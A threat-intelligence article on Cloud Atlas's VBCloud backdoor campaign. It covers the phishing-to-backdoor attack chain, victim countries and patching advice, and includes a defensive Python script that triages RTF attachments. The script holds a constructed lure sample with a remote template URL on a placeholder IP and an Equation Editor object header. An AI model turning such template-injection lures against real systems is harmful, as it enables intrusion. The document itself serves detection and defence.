VBCloud malware is a rising threat: Cloud Atlas, a long-active threat group, has been linked to a new wave of attacks that deliver a previously undocumented backdoor known as VBCloud.
These attacks target organizations mostly in Russia, with victims in several other countries, and show how the group's tooling evolved in 2024. According to Kaspersky's analysis, VBCloud handles data theft and further compromise of the host, and the chain begins with phishing emails carrying documents that exploit the Microsoft Office Equation Editor.
The campaign is a reminder for defenders that a six-year-old, long-patched Office flaw still works against unpatched hosts, and that vigilance against phishing remains essential.
Key Takeaways on Cloud Atlas and VBCloud Malware:
- Cloud Atlas is using VBCloud malware against organizations, primarily in Russia, with additional victims in several other countries.
Unpacking the Threat: How Cloud Atlas Uses VBCloud Malware
Who Is Cloud Atlas?
Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, has been active since 2014. The group is known for sophisticated cyberattacks using spear-phishing campaigns to deliver malware payloads.
Previous operations linked to the group include the December 2022 attacks in Russia, Belarus, and Transnistria, deploying the PowerShower backdoor.
The VBCloud Malware
The latest campaign introduces VBCloud, a VBScript-based backdoor used alongside the group's existing VBShower and PowerShower tools. This malware enables the attackers to:
- Steal sensitive data: Including documents, system metadata, and Telegram-related files.
- Use cloud storage for communication: Enhancing stealth and resilience against detection.
- Run a staged infection: phishing emails carry documents that pull a remote RTF template, which in turn exploits the Equation Editor flaw CVE-2018-0802.
Attack Chain Breakdown
Here’s how the attack unfolds:
| Stage | Details |
|---|---|
| Phishing Email | A document attachment crafted for the target is sent by email. |
| RTF Template Injection | The document fetches a remote RTF template that exploits the Equation Editor flaw (CVE-2018-0802) and downloads an HTML Application (HTA) file. |
| VBShower Deployment | The HTA drops VBShower, which stores its files in NTFS alternate data streams (ADS) and deletes traces of the initial infection. |
| VBCloud Activation | Scheduled tasks launch VBCloud, which collects data and talks to its command-and-control server over public cloud storage. |
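As an added illustration (not code from the Kaspersky report or from this article), the following Python script statically triages an RTF attachment for the two first-stage indicators in the table above: a remote template reference (template injection) and an embedded Equation Editor object. The sample RTF documents and the `203.0.113.10` URL are constructed for the example; the `Equation.3` ProgID and CLSID `{0002CE02-0000-0000-C000-000000000046}` are the real Equation Editor 3.0 registration. Real lures often obfuscate these keywords, so treat the script as a starting point rather than a complete detector.

```python
import re
from dataclasses import dataclass, field

# Equation Editor 3.0 (EQNEDT32.EXE) is registered as ProgID "Equation.3" with
# CLSID {0002CE02-0000-0000-C000-000000000046}. Inside an OLE container the
# CLSID is serialised with its first three fields little-endian.
EQUATION_PROGID = b"Equation.3"
EQUATION_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")

# A \*\template pointing at any of these is template injection, not a local template.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "file://", "\\\\")

TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s+([^}]+)\}", re.I)
OBJCLASS_RE = re.compile(rb"\\objclass\s+([^}\\\s]+)", re.I)
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)", re.I)


@dataclass
class RtfFindings:
    remote_templates: list = field(default_factory=list)
    object_classes: list = field(default_factory=list)
    equation_editor: bool = False

    @property
    def verdict(self) -> str:
        return "suspicious" if (self.remote_templates or self.equation_editor) else "clean"


def _decode_objdata(hexblob: bytes) -> bytes:
    """Turn the hex dump inside \\objdata back into bytes, ignoring whitespace."""
    clean = re.sub(rb"\s+", b"", hexblob)
    if len(clean) % 2:          # tolerate a truncated trailing nibble
        clean = clean[:-1]
    return bytes.fromhex(clean.decode("ascii"))


def triage_rtf(data: bytes) -> RtfFindings:
    """Return the template-injection and Equation Editor indicators found in an RTF blob."""
    findings = RtfFindings()
    if not data.lstrip().startswith(b"{\\rt"):    # \rtf1, or the \rt alias Word accepts
        return findings                             # not RTF; nothing to say about it

    # Stage 2 indicator: the document asks Word to fetch a template from a remote location.
    for m in TEMPLATE_RE.finditer(data):
        target = m.group(1).strip().decode("latin-1")
        if target.lower().startswith(REMOTE_SCHEMES):
            findings.remote_templates.append(target)

    # Exploit indicator: an embedded OLE object whose declared class is Equation Editor.
    for m in OBJCLASS_RE.finditer(data):
        cls = m.group(1).decode("latin-1")
        findings.object_classes.append(cls)
        if cls.lower().startswith("equation"):
            findings.equation_editor = True

    # The class name can be omitted or faked, so also inspect the decoded object payload.
    for m in OBJDATA_RE.finditer(data):
        payload = _decode_objdata(m.group(1))
        if EQUATION_PROGID in payload or EQUATION_CLSID_LE in payload:
            findings.equation_editor = True

    return findings


# Constructed samples for this example (not real Cloud Atlas lures). The \objdata hex is a
# truncated OLE1-style header: version, format id, class-name length, "Equation.3\0".
LURE_RTF = (
    rb"{\rtf1\ansi\deff0"
    rb"{\*\template http://203.0.113.10/report.dotm}"
    rb"{\object\objemb{\*\objclass Equation.3}"
    rb"{\*\objdata 0105000002000000 0b000000 4571756174696f6e2e3300}}"
    rb"Quarterly report\par}"
)
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}Hello world\par}"

if __name__ == "__main__":
    for name, blob in (("lure", LURE_RTF), ("benign", BENIGN_RTF)):
        f = triage_rtf(blob)
        print(f"{name}: {f.verdict} templates={f.remote_templates} "
              f"classes={f.object_classes} equation_editor={f.equation_editor}")
```

Run it over a directory of quarantined attachments and route anything marked `suspicious` to a sandbox. The keyword regexes only catch plain `\*\template` and `\objclass` tokens; lures routinely split or pad these with junk control words, so pair this with a full RTF tokenizer such as `rtfobj` from the oletools package rather than relying on it alone.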
Impact and Reach
Kaspersky’s report reveals that over 80% of the victims are based in Russia, with others identified in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
VBCloud's use of public cloud storage for command-and-control (C2) communications lets its traffic blend in with legitimate cloud use, which defeats simple domain and IP blocklists and makes the activity harder to spot in network logs.
Real-Life Example
This is not the first time Cloud Atlas has used such techniques against its targets.
In 2022, the group deployed the PowerShower backdoor in spear-phishing attacks that exploited Microsoft Office vulnerabilities to gain an initial foothold.
Forecast: The Evolving Threat Landscape
As threat actors like Cloud Atlas refine their tools and tactics, we are likely to see wider use of cloud services as malware C2 channels.
Organizations should prioritize patching (the Equation Editor flaws abused here were fixed in 2018), filter inbound documents at the mail gateway, and train staff to recognize phishing attempts.
About Kaspersky
Kaspersky is a global cybersecurity company renowned for its advanced threat intelligence and solutions. They offer comprehensive protection for enterprises, governments, and individuals worldwide.
Rounding Up
The rise of VBCloud malware demonstrates Cloud Atlas's ability to innovate and adapt, and underscores the need for continuous vigilance. By staying informed about threats like VBCloud and taking proactive steps, individuals and organizations can significantly reduce their risk of falling victim to these attacks.
FAQs
What is VBCloud malware?
- VBCloud is a backdoor used by Cloud Atlas for data theft and further compromise of infected systems.
How does VBCloud infect systems?
- It arrives through phishing emails with malicious documents that exploit the Microsoft Office Equation Editor (CVE-2018-0802).
Who are the primary targets of Cloud Atlas?
- Over 80% of the victims are in Russia, with others in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
What measures can protect against VBCloud?
- Keep Office and Windows patched, filter inbound documents at the mail gateway, and educate users about phishing tactics.
Why is VBCloud difficult to detect?
- It uses public cloud storage for C2 communications, so its traffic looks like ordinary cloud use and is harder to trace.